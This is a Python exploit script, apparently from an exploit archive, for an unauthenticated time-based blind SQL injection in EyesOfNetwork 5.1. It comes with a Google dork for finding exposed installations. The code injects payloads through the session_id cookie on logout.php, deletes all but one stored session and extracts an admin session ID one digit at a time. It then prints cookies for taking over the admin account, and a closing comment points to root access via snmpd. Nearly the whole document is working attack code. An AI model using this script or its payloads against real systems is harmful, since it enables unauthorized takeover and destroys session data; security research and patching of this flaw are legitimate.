83 lines
No EOL
3.3 KiB
Python
Executable file
83 lines
No EOL
3.3 KiB
Python
Executable file
# Exploit Title: EyesOfNetwork (EON) 5.1 Unauthenticated SQL Injection in eonweb leading to remote root
|
|
# Google Dork: intitle:EyesOfNetwork intext:"sponsored by AXIANS"
|
|
# Date: 29/03/2017
|
|
# Exploit Author: Dany Bach
|
|
# Vendor Homepage: https://www.eyesofnetwork.com/
|
|
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.1-x86_64-bin.iso
|
|
# Version: EyesOfNetwork <= 5.1
|
|
# Tested on: EyesOfNetwork 5.1 and 5.0
|
|
# CVE: None
|
|
# Contact: Dany Bach [@ddxhunter, rioru.github.io]
|
|
# Advisory and description of the complete scenario: https://rioru.github.io/pentest/web/2017/03/28/from-unauthenticated-to-root-supervision.html
|
|
# Fix: None
|
|
|
|
import time
|
|
from requests import *
|
|
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
|
|
|
packages.urllib3.disable_warnings(InsecureRequestWarning)
|
|
|
|
url = "https://192.168.1.161"
|
|
|
|
print "[!] Proof of Concept for the Unauthenticated SQL Injection in EyesOfNetwork 5.1 (DELETE statement) - Rioru (@ddxhunter)"
|
|
|
|
def getTime(page, cookie=""):
|
|
start = time.time()
|
|
get(url+page, verify=False, cookies=dict(session_id=cookie))
|
|
end = time.time()
|
|
return round(end - start, 2)
|
|
|
|
# Getting an initial response time to base our next requests around it
|
|
initial_time = getTime("/") - 0.01
|
|
getTime("/logout.php", "rioru' OR user_id!=1 -- -")
|
|
print "[+] The initial request time on %s is %f, getting the number of entries, it could take a while..." % (url, initial_time)
|
|
sleep1_time = getTime("/logout.php", "rioru' OR SLEEP(1)=1337 -- -")
|
|
if (sleep1_time - initial_time >= 1):
|
|
count = round(sleep1_time)
|
|
print "[+] Found %d entries in the [sessions] table, deleting every sessions except one" % count
|
|
else:
|
|
print "[-] The table [sessions] seems empty"
|
|
exit()
|
|
|
|
for i in range(int(count) - 1):
|
|
getTime("/logout.php", "rioru' OR 1=1 LIMIT 1 -- -")
|
|
|
|
# Get the length
|
|
session_length = 0
|
|
for i in range(12):
|
|
execTime = getTime("/logout.php", "rioru' OR (SELECT CASE WHEN ((SELECT LENGTH(session_id) FROM DUAL ORDER BY session_id LIMIT 1)="+ str(i+1) +") THEN SLEEP(1) ELSE 1 END)=1337 -- -")
|
|
if (round(execTime - initial_time) >= 1):
|
|
session_length = i+1
|
|
break
|
|
if (session_length == 0):
|
|
print "[-] Couldn't find the length of the session_id"
|
|
exit()
|
|
print "[+] Found an admin session length: %d, getting the session_id" % session_length
|
|
|
|
# Get the session_id
|
|
print "[+] session_id: ",
|
|
session_id = ""
|
|
for i in range(session_length):
|
|
for j in range(10):
|
|
execTime = getTime("/logout.php", "rioru' OR (SELECT CASE WHEN (SUBSTRING((SELECT session_id FROM DUAL ORDER BY session_id LIMIT 1),"+ str(i+1) +",1)="+ str(j) +") THEN SLEEP(1) ELSE 1 END)=1337 -- -")
|
|
if (round(execTime - initial_time) >= 1):
|
|
session_id += str(j)
|
|
print str(j),
|
|
break
|
|
print "\n[+] final session_id: [%s]" % session_id
|
|
|
|
# Get the username
|
|
execTime = getTime("/logout.php", "rioru' OR (SELECT CASE WHEN ((SELECT user_name FROM users WHERE user_id=1)='admin') THEN SLEEP(1) ELSE 1 END)=1337 -- -")
|
|
if (round(execTime - initial_time) >= 1):
|
|
print "[+] Username is [admin]"
|
|
else:
|
|
print "[-] Username is not admin, brute force necessary"
|
|
|
|
print "[+] End of the PoC use these cookies to authenticate to Eonweb:"
|
|
print "session_id: %s;" % session_id
|
|
print "user_name: %s;" % "admin"
|
|
print "user_id: %d;" % 1
|
|
print "user_limitation: %d;" % 0
|
|
print "group_id: %d;" % 1
|
|
|
|
# Root privileges can be gained using snmpd once authenticated |